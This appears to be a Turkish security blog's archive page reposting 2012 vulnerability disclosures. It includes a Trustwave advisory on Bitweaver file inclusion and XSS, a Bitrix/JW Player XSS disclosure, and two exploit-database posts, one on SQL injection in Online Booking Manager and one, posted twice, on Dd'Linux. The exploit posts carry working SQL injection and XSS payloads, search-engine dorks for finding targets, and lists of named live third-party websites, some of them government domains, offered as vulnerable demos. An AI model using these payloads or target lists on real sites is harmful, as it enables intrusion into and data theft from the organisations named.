Archive for 25 Ekim 2012

admin | 25 Ekim 2012
No comments

Bitweaver 2.8.1 Multiple Vulnerabilities

Bitweaver 2.8.1 versiyonunda çeşitli XSS açıkları bulundu. Scriptte meydana gelen açıklar, açığın oluşun yerleri ve açık hakkındaki açıklamalar şu şekilde;

Trustwave SpiderLabs Security Advisory TWSL2012-016:
Multiple Vulnerabilities in Bitweaver

Published: 10/23/2012
Version: 1.0

Vendor: Bitweaver (http://www.bitweaver.org/)
Product: Bitweaver
Version affected: 2.8.1 and earlier versions

Product description:
Bitweaver is a free and open source web application framework and content
management system. Bitweaver is written in PHP and uses Firebird as a
database backend.

Credit: David Aaron and Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Local File Inclusion Vulnerability
CVE: CVE-2012-5192

The 'overlay_type' parameter in the 'gmap/view_overlay.php' page in
Bitweaver is vulnerable to a local file inclusion vulnerability.

This vulnerability can be demonstrated by traversing to a known readable
path on the web server file system.

Example:

Performing LFI on 'overlay_type' parameter

#Request

http://A.B.C.D/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

#Response

root:x:0:0:root:/root:/bin/bash
<snip>

Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE: CVE-2012-5193 

Multiple cross-site scripting (XSS) vulnerabilities have been discovered
that allow remote unauthenticated users to run arbitrary scripts on the
system.

Example:

The following Proof of Concepts illustrate that Bitweaver 2.8.1 is
vulnerable to XSS.

Example(s):

1. Performing XSS on stats/index.php

#Request

GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

2. Performing XSS on /newsletters/edition.php

#Request

GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

3. Performing XSS on the 'username' parameter available on /users/

#Request

POST /bitweaver/users/remind_password.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15974
[truncated due to length]

<snip>
Invalid or unknown username: ">alert('XSS');</p></div>Please follow the instructions in the email.
<snip>

4. Performing XSS on the 'days' parameter on /stats/index.php

#Request

POST /bitweaver/stats/index.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

days=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&pv_chart=Display

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24778
[truncated due to length]

<snip>
<img src="/stats/pv_chart.php?days="><script>alert('XSS');</script>" alt="Site Usage Statistics" />
<snip>

5. Performing XSS on the 'login' parameter on /users/register.php. (try
entering "><IFRAME src="https://www.trustwave.com" height="1000px"
width="1000px"> into the "Username field"):

http://A.B.C.D/bitweaver/users/register.php


6. Performing XSS on the 'highlight' parameter:

#Request

GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:59:09 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

Remediation Steps:
The vendor has released a fix to address the Local File Inclusion
vulnerability (finding 1) and several of the Cross-Site Scripting
vulnerabilities (finding 2) in Bitweaver 3.1. However, additional fixes for
the Cross-site Scripting vulnerabilities were made on commit c3bef6f in the
development branch.  Users are recommended to download the latest release
of Bitweaver on http://github.com/bitweaver to address the above issues.

These issue can also be mitigated with the use of technologies, such as Web
Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Often,
Vulnerability Scanners and Intrusion Detection Systems (IDS) can detect the
presence of Local File Inclusion vulnerabilities and XSS. Trustwave
technologies that address this issue include the following.

ModSecurity (http://www.modsecurity.org/) has added rules to the commercial
rules feed for these issues, available as part of the SpiderLabs
ModSecurity rules feed.

Trustwave's vulnerability scanning solution, TrustKeeper
(https://www.trustwave.com/trustKeeper.php), has been updated to detect
affected versions.

References
http://www.bitweaver.org/
http://blog.spiderlabs.com/

Vendor Communication Timeline:
04/26/12 - Initial communications with vendor
05/14/12 - Vulnerability disclosed to vendor
05/30/12 - Vendor acknowledges version 3.0 fixes issues
06/07/12 - Contact vendor regarding incomplete fixes in 3.0
09/07/12 - Vendor publishes version 3.1
10/10/12 - Contact vendor regarding incomplete fixes in 3.1
10/23/12 - Advisory published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
Category: Genel | Tags: ,
admin | 23 Ekim 2012
No comments

Bitrix Site Manager 11.5 XSS / Content Spoofing

Bitrix Site Manager 11.5 XSS / Content Spoofing Açıkları bulunmuş olup açık hakkında oluşum yerleri ve açık hakkında açıklamalar şu şekilde;

I want to warn you about security vulnerabilities in Bitrix Site Manager. It  
is commercial CMS. 
 
These are Content Spoofing and Cross-Site Scripting vulnerabilities. These  
holes bypass built-in WAF and all other protections of Bitrix. 
 
------------------------- 
Affected products: 
------------------------- 
 
Vulnerable are Bitrix Site Manager 11.5 and previous versions. Which consist  
JW Player Pro. 
 
Versions of Bitrix 11.5 after 2012.08.24 must be not affected, because the  
developers fixed these holes after my informing. As I've checked (at main  
sites of developers, where I found these vulnerabilities), they were fixed  
by removing this flash file. 
 
Vulnerabilities are similar to the ones in JW Player  
(http://securityvulns.ru/docs28176.html) and JW Player Pro  
(http://securityvulns.ru/docs28483.html). 
 
For finding these holes, which bypass WAF and all other their protections,  
1C-Bitrix had no need to waste their time and money on conducting  
competition on hacking conference CC9  
(http://www.1c-bitrix.ru/about/life/news/171346/) for bypassing their  
Proactive Protection (WAF) and other protections of CMS, or working with one  
security company, all of which were unable to find these holes in Bitrix for  
many years, but they just should contact me. Or just read my public advisory  
in June concerning vulnerabilities in JW Player. 
 
---------- 
Details: 
---------- 
 
Content Spoofing (WASC-12): 
 
In parameter file there can be set as video, as audio files. 
 
Swf-file of JW Player accepts arbitrary addresses in parameters file and  
image, which allows to spoof content of flash - i.e. by setting addresses of  
video (audio) and/or image files from other site. 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&image=1.jpg 
 
Swf-file of JW Player accepts arbitrary addresses in parameter config, which  
allows to spoof content of flash - i.e. by setting address of config file  
from other site (parameters file and image in xml-file accept arbitrary  
addresses). For loading of config file from other site it needs to have  
crossdomain.xml. 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?config=1.xml 
 
1.xml 
 
<config> 
<file>1.flv</file> 
<image>1.jpg</image> 
</config> 
 
Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile,  
which allows to spoof content of flash - i.e. by setting address of playlist  
file from other site (parameters media:content and media:thumbnail in  
xml-file accept arbitrary addresses). For loading of playlist file from  
other site it needs to have crossdomain.xml. 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playlistfile=1.rss 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swfplaylistfile=1.rss&playlist.position=right&playlist.size=200 
 
1.rss 
 
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/"> 
<channel> 
<title>Example playlist</title> 
<item> 
<title>Video #1</title> 
<description>First video.</description> 
<media:content url="1.flv" duration="5" /> 
<media:thumbnail url="1.jpg" /> 
</item> 
<item> 
<title>Video #2</title> 
<description>Second video.</description> 
<media:content url="2.flv" duration="5" /> 
<media:thumbnail url="2.jpg" /> 
</item> 
</channel> 
</rss> 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie) 
 
XSS (WASC-08): 
 
If at the site at page with jwplayer.swf (player.swf) there is possibility  
(via HTML Injection) to include JS code with callback-function, and there  
are 19 such functions in total, then it's possible to conduct XSS attack.  
I.e. JS-callbacks can be used for XSS attack. 
 
Example of exploit: 
 
<script type="text/javascript" src="jwplayer.js"></script> 
<div id="container">...</div> 
<script type="text/javascript"> 
jwplayer("container").setup({ 
flashplayer: "jwplayer.swf", 
file: "1.flv", 
autostart: true, 
height: 300, 
width: 480, 
events: { 
onReady: function() { alert(document.cookie); }, 
onComplete: function() { alert(document.cookie); }, 
onBufferChange: function() { alert(document.cookie); }, 
onBufferFull: function() { alert(document.cookie); }, 
onError: function() { alert(document.cookie); }, 
onFullscreen: function() { alert(document.cookie); }, 
onMeta: function() { alert(document.cookie); }, 
onMute: function() { alert(document.cookie); }, 
onPlaylist: function() { alert(document.cookie); }, 
onPlaylistItem: function() { alert(document.cookie); }, 
onResize: function() { alert(document.cookie); }, 
onBeforePlay: function() { alert(document.cookie); }, 
onPlay: function() { alert(document.cookie); }, 
onPause: function() { alert(document.cookie); }, 
onBuffer: function() { alert(document.cookie); }, 
onSeek: function() { alert(document.cookie); }, 
onIdle: function() { alert(document.cookie); }, 
onTime: function() { alert(document.cookie); }, 
onVolume: function() { alert(document.cookie); } 
} 
}); 
</script> 
 
There is such feature as logo in licensed version of the player. So in  
licensed versions of swf-file there are also the next vulnerabilities: 
 
Content Spoofing (WASC-12): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&logo.file=1.jpg&logo.link=http://websecurity.com.ua 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&logo.file=1.jpg&logo.link=javascript:alert(document.cookie) 
 
Content Spoofing (WASC-12): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B 
 
------------ 
Timeline: 
------------  
 
2012.08.16 - informed developers about the first part of vulnerabilities. 
2012.08.17 - on their answer, I gave recommendations to developers about  
fixing vulnerabilities. 
2012.08.19 - informed developers about the second part of vulnerabilities. 
2012.08.20 - announced at my site. 
2012.08.24 - developers informed that they have fixed all these  
vulnerabilities. 
2012.10.20 - disclosed at my site (http://websecurity.com.ua/5992/).
Category: Genel | Tags:
admin | 23 Ekim 2012
No comments

Online Booking Manager Hotels Portal – SQLi Vulnerability

Online Booking Manager Hotels Portal – SQLi Vulnerability
açık ve açığın kullanımı hakkında örnekler şu şekilde;

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm DaOne member from Inj3ct0r Team                    1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
########################################## 
# Exploit Title: Online Booking Manager Hotels Portal - SQLi Vulnerability 
# Date: 2012-10-19 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.onlinebookingmanager.com/obm-portal-hotels/index.php 
# Category: webapps/php 
# Version: 5.2 
# Price: 912 USD 
# Google dork: inurl:besthotels.php?portalID= 
########################################## 
[#] Exploit: 
http://[host]/besthotels.php?orderBy=(ErrorBased Injection) 
orderBy=1+and(select 1 FROM(select count(*),concat((select (select concat(user(),database(),version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) 
 
# Demo: 
http://www.stayinkos.com/hotels/besthotels.php?orderBy=1' 
http://ahabooking.com/besthotels.php?orderBy=1' 
http://bookingeurope.co/besthotels.php?orderBy=1' 
 
---- 
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team.
Category: Genel | Tags:
admin | 23 Ekim 2012
No comments

Dd'Linux – SQL Injection / Cross-Site Scripting Vulnerabilities

Dd’Linux – SQL Injection / Cross-Site Scripting Vulnerabilities açıkları bulundu. Açık hakkındaki açıklamalar şu şekilde.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /'             __  /'__`        / __  /'__`                    0
0   /_,     ___   /_/_      ___  ,_/ /   _ ___            1
1   /_/  /' _ ` / /_/__<_  /'___  /    /`'__           0
0        / /    /   / __/  _  _   /            1
1        _ _ __   ____/ ____\ __\ ____/ _            0
0        /_//_//_/ _ /___/  /____/ /__/ /___/  /_/            1
1                    ____/ >> Exploit database separated by exploit    0
0                    /___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|    Dd'Linux - SQL Injection  / Cross-Site Scripting Vulnerabilities    |
--------------------------------------------------------------------------

+----------------| ABOUT ME |--------------------+
NAME:     TAURUS OMAR                            -
HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
FBOOK:                    -
TWITTER:                             -
E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
E-MAIL:   omar-taurus[at]live[dot]com            -
PWNED:    #ZUUU                                  -
+------------------------------------------------+

# Exploit Title: Dd'linux - SQL Injection  / Cross-Site Scripting Vulnerabilities
# Vendor Name: Dd'linux
# Url Vendor: http://www.ddlinux.com/
# Category: WebApps
# Type: php
# Risk:  Critical
# Dork: intext:"Desarrollado por dd'linux"

# Example/Sql=> http//site.com/xxxx?id=1
# Example/Xss=> http//site.com/search.php [XSS]


# Sample/Sql
http://www.avso.com.ec/galeria_foto.php?codigo_album=12%'
http://www.babahoyo.gob.ec/pagina.php?id=6%'
http://david.ddlinux.com/galeria_foto.php?codigo_album=4%'
http://www.coac-sanfra.com/pagina.php?id=1%'
http://www.chibuleo.com/novedad.php?codigo=3%'
http://www.emapa.gob.ec/galeria_foto.php?codigo_album=5%'
http://www.galapagostech.com/index.php?id=1%'
http://www.fmrumba.com/contactenos.php?id=7%'
http://www.bioalimentar.com.ec/avimentos/plan_alimenticio.php?id=1%'

# Comand/Sql/Payload=> UNION ALL SELECT CONCAT(CHAR(58,105,107,113,58),IFNULL(CAST(CHAR(115,80,76,103,105,73,101,82,73,107) AS CHAR),CHAR(32)),CHAR(58,100,113,119,58)), NULL#

# Info => Same Tables and Columns All Vulnerability Site's
+-------------------------+
| agenda                  |
| album                   |
| banner                  |
| banner_ubicacion        |
| contador                |
| imagen                  |
| imagenes_animacion      |
| mails                   |
| mails_paginas           |
| noticia                 |
| opcion                  |
| opcion1                 |
| opcion2                 |
| opciones                |
| opciones1               |
| transparencia_archivo   |
| transparencia_categoria |
| users                   |
| varios                  |
+-------------------------+

# Sample/Xss
http://david.ddlinux.com/buscar.php
http://www.fmrumba.com/buscar.php
http://www.babahoyo.gob.ec/buscar.php

# Comand/Xss/=> "><img src=x onerror=alert("1337");>

# Vulnerability/Code
<tbody><tr>
<td><input name="busqueda" id="busqueda" value="" size="15" type="text">
<input name="Submit" class="secondaryAction" id="Submit" value="" type="submit"></td>
</tr>
</tbody>
Category: Genel | Tags: ,
admin | 23 Ekim 2012
No comments

Dd’Linux – SQL Injection / Cross-Site Scripting Vulnerabilities

Dd’Linux – SQL Injection / Cross-Site Scripting Vulnerabilities açıkları bulundu. Açık hakkındaki açıklamalar şu şekilde.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0      _                   __           __       __                      1 
1    /' \            __  /'__`\        /\ \__  /'__`\                    0 
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1 
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0 
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1 
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0 
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1 
1                   \ \____/ >> Exploit database separated by exploit    0 
0                    \/___/          type (local, remote, DoS, etc.)     1 
1                                                                        1 
0   [x] Official Website: http://www.1337day.com                         0 
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1 
0                                                                        0 
1               ==========================================               1 
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1 
1               ==========================================               0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 
|                                                                        | 
|    Dd'Linux - SQL Injection  / Cross-Site Scripting Vulnerabilities    |  
-------------------------------------------------------------------------- 
 
+----------------| ABOUT ME |--------------------+ 
NAME:     TAURUS OMAR                            - 
HOME:     ACCESOILEGAL.BLOGSPOT.COM              - 
FBOOK:                    - 
TWITTER:                             - 
E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  - 
E-MAIL:   omar-taurus[at]live[dot]com            - 
PWNED:    #ZUUU                                  - 
+------------------------------------------------+ 
 
# Exploit Title: Dd'linux - SQL Injection  / Cross-Site Scripting Vulnerabilities 
# Vendor Name: Dd'linux 
# Url Vendor: http://www.ddlinux.com/ 
# Category: WebApps 
# Type: php 
# Risk:  Critical 
# Dork: intext:"Desarrollado por dd'linux"
 
# Example/Sql=> http//site.com/xxxx?id=1 
# Example/Xss=> http//site.com/search.php [XSS] 
 
 
# Sample/Sql  
http://www.avso.com.ec/galeria_foto.php?codigo_album=12%' 
http://www.babahoyo.gob.ec/pagina.php?id=6%' 
http://david.ddlinux.com/galeria_foto.php?codigo_album=4%' 
http://www.coac-sanfra.com/pagina.php?id=1%' 
http://www.chibuleo.com/novedad.php?codigo=3%' 
http://www.emapa.gob.ec/galeria_foto.php?codigo_album=5%' 
http://www.galapagostech.com/index.php?id=1%' 
http://www.fmrumba.com/contactenos.php?id=7%' 
http://www.bioalimentar.com.ec/avimentos/plan_alimenticio.php?id=1%' 
 
# Comand/Sql/Payload=> UNION ALL SELECT CONCAT(CHAR(58,105,107,113,58),IFNULL(CAST(CHAR(115,80,76,103,105,73,101,82,73,107) AS CHAR),CHAR(32)),CHAR(58,100,113,119,58)), NULL# 
 
# Info => Same Tables and Columns All Vulnerability Site's 
+-------------------------+ 
| agenda                  | 
| album                   | 
| banner                  | 
| banner_ubicacion        | 
| contador                | 
| imagen                  | 
| imagenes_animacion      | 
| mails                   | 
| mails_paginas           | 
| noticia                 | 
| opcion                  | 
| opcion1                 | 
| opcion2                 | 
| opciones                | 
| opciones1               | 
| transparencia_archivo   | 
| transparencia_categoria | 
| users                   | 
| varios                  | 
+-------------------------+ 
 
# Sample/Xss 
http://david.ddlinux.com/buscar.php 
http://www.fmrumba.com/buscar.php 
http://www.babahoyo.gob.ec/buscar.php 
 
# Comand/Xss/=> "><img src=x onerror=alert("1337");>   
 
# Vulnerability/Code 
<tbody><tr> 
<td><input name="busqueda" id="busqueda" value="" size="15" type="text"> 
<input name="Submit" class="secondaryAction" id="Submit" value="" type="submit"></td> 
</tr> 
</tbody>
Category: Genel | Tags: ,
« Older Entries   Recent Entries »